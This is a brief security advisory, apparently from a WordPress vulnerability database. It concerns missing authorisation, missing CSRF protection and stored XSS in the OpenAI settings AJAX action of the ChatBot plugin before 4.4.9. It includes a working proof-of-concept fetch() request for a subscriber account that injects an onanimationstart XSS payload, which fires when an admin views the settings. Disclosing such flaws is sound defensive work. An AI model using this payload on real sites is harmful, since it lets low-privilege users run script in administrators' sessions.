ChatBot < 4.4.9 - Subscriber+ OpenAI Settings Update to Stored XSS

The plugin does not have authorisation and CSRF in the AJAX action responsible to update the OpenAI settings, allowing any authenticated users, such as subscriber to update them. Furthermore, due to the lack of escaping of the settings, this could also lead to Stored XSS

PoC

Run the below command in the developer console of the web browser while being on the blog as subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=openai_settings_option&api;_key=" style=animation-name:rotation onanimationstart=alert(/XSS/)//’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The XSS will be trigged when an admin view the OpenAI Settings (/wp-admin/admin.php?page=wpbot_openAi)